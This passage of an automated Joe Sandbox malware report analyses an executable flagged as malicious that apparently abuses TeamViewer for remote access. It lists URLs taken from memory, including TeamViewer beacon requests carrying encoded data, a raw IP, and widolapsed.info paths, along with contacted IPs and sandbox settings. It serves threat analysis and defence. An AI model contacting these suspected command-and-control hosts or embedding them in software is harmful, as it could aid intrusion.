            http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001false
              		high
              http://master12.teamviewer.com/dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A==false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.teamviewer.com/help/support.aspxKwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                  		high
                  https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campaiUniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpfalse
                    		high
                    https://widolapsed.info/apsed.info/s/StoreAppNameUniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGatedUniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpfalse
                      		high
                      https://widolapsed.info/apsed.info/B8C631A8/soft.Microsoft3DViUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://widolapsed.info/apsed.info/B8C631A8/ources/DisplayNamevUniPrint.exe, 00000004.00000003.415242974.00000000057D5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://widolapsed.info/apsed.info/tral_neutral_cw5n1h2txyewy?UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://widolapsed.info/apsed.info/UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.466393951.00000000057D5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpfalse
                        		high
                        https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmpfalse
                          		high
                          https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                            		high
                            http://www.TeamViewer.com/helpwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                              		high
                              https://widolapsed.info/8C631A8/eUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://widolapsed.info/8C631A8/esources/StoreAppNUniPrint.exe, 00000004.00000002.545681944.00000000057D5000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpfalse
                                		high
                                http://www.TeamViewer.com/downloadwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                  		high
                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpfalse
                                    		high
                                    http://mastr12.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=7UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpfalse
                                      		high
                                      https://widolapsed.info/B8C631A8/8UniPrint.exe, 00000004.00000003.308537365.00000000057A7000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://widolapsed.info/B8C631A8/9UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://widolapsed.info/B8C631A8/ackageDisplayNameUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=1000UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                                        		high
                                        https://widolapsed.info/B8C631A8/pNameUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.TeamViewer.com#http://www.TeamViewer.com/licensingwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                          		high
                                          http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001&%UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.bingmapsportal.comsvchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmpfalse
                                              		high
                                              https://widolapsed.info/apsed.info/8C631A8/9UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://widolapsed.info/2iUniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://widolapsed.info/B8C631A8/lopmentPropertieslUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://widolapsed.info/aUniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.teamviewer.com/help/connectivity.aspx:wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                		high
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.316800598.000001BF60645000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://widolapsed.info/8C631A8/9UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.teamviewer.com/favicon.icowogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                    		high
                                                    https://widolapsed.info/UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.460571183.00000000057D5000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://widolapsed.info/B8C631A8/lopmentPropertieshUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://widolapsed.info/B8C631A8/esources/StoreAppNUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://widolapsed.info/B8C631A8/d.info/B8C631A8/UniPrint.exe, 00000004.00000003.379200176.00000000057A7000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://widolapsed.info/3DViewer_2.1803.8022.0_x64_UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.ver)svchost.exe, 00000003.00000002.538052811.0000024FB000E000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0swogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001vUniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://nsis.sf.net/NSIS_ErrorErrorwogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmpfalse
                                                        		high
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://widolapsed.info/erviceUniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://widolapsed.info/iUniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://%s.xboxlive.comsvchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		low
                                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.teamviewer.com/download/beta.aspxwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                		high
                                                                http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                  		high
                                                                  https://widolapsed.info/apsed.info/ameCallableUI/resources/PkgUniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://widolapsed.info/vider/Resources/DisplayNamevUniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002lUniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://master12.teamviewer.com/dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoUniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://widolapsed.info/64__8wekyb3d8bbwe?ms-resource://MicrosoUniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://widolapsed.info/~UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://nsis.sf.net/NSIS_ErrorwogZe27GBB.exe, wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmpfalse
                                                                        		high
                                                                        https://dynamic.tsvchost.exe, 0000000B.00000003.316700720.000001BF60664000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://widolapsed.info/B8C631A8/resource://MicrosoUniPrint.exe, 00000004.00000003.332650410.00000000057D5000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://widolapsed.info/8C631A8/ources/DisplayNamevUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://widolapsed.info/-resource://Microsoft.Microsoft3DViewer4UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://188.172.198.151/client=DynGate&rnd=78504903&p=10000001UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://widolapsed.info/B8C631A8/ources/DisplayNamevUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.teamviewer.com/ja/company/shutdown.aspxwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                              		high
                                                                              http://188.172.198.151/dout.aspx?s=12418339&p=10000002&clientUniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://widolapsed.info/8C631A8/resource://MicrosoUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.teamviewer.com/ja/licensing/commercialuse.aspxUniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://widolapsed.info/B8C631A8/leUI/resources/PkgUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://www.teamviewer.com/licensing/order.aspx?lng=jawogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                                      		high
                                                                                      http://master12.teamviewer.com/din.aspx?s=40082864&client=DynGate&p=10000002er12.teamviewer.comUniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.teamviewer.com/download/version_4x/TeamViewerQS.exewogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                                          		high
                                                                                          http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmpfalse
                                                                                            		high
                                                                                            http://master12.teamviewer.com/dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://widolapsed.info/8C631A8/al_cw5n1h2txyewy?m0UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://widolapsed.info/apsed.info/3DViewer_2.1803.8022.0_x64_UniPrint.exe, 00000004.00000003.446837962.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://ocsp.sectigo.com0wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://widolapsed.info/apsed.info/B8C631A8/lopmentPropertieshUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://188.172.198.151/UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://widolapsed.info/1UniPrint.exe, 00000004.00000003.325324514.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://widolapsed.info/s/StoreAppNameUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.teamviewer.com/download/version_5x/TeamViewerQS.exewogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                                                    		high
                                                                                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpfalse
                                                                                                      		high

                                                                                                      Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      185.188.32.22
                                                                                                      		master12.teamviewer.comGermany
                                                                                                      		43304TEAMVIEWER-ASDEfalse
                                                                                                      188.172.198.151
                                                                                                      		unknownAustria
                                                                                                      		42473AS-ANEXIAANEXIAInternetdienstleistungsGmbHATfalse
                                                                                                      45.153.241.148
                                                                                                      		widolapsed.infoGermany
                                                                                                      		30823COMBAHTONcombahtonGmbHDEfalse

                                                                                                      Private

                                                                                                      IP
                                                                                                      192.168.2.1
                                                                                                      127.0.0.1

                                                                                                      General Information

                                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                                      Analysis ID:483790
                                                                                                      Start date:15.09.2021
                                                                                                      Start time:13:43:48
                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                      Overall analysis duration:0h 15m 13s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Sample file name:wogZe27GBB (renamed file extension from none to exe)
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                      Number of analysed new started processes analysed:28
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • HDC enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Detection:MAL
                                                                                                      Classification:mal76.evad.winEXE@23/18@4/5
                                                                                                      EGA Information:Failed
                                                                                                      HDC Information:
                                                                                                      • Successful, ratio: 23% (good quality ratio 22.2%)
                                                                                                      • Quality average: 82.6%
                                                                                                      • Quality standard deviation: 25.5%
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Adjust boot time
                                                                                                      • Enable AMSI
                                                                                                      Warnings:
                                                                                                      Show All
                                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, UsoClient.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.82.210.154, 209.197.3.8, 40.112.88.60, 23.216.77.208, 23.216.77.209, 20.54.110.249
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
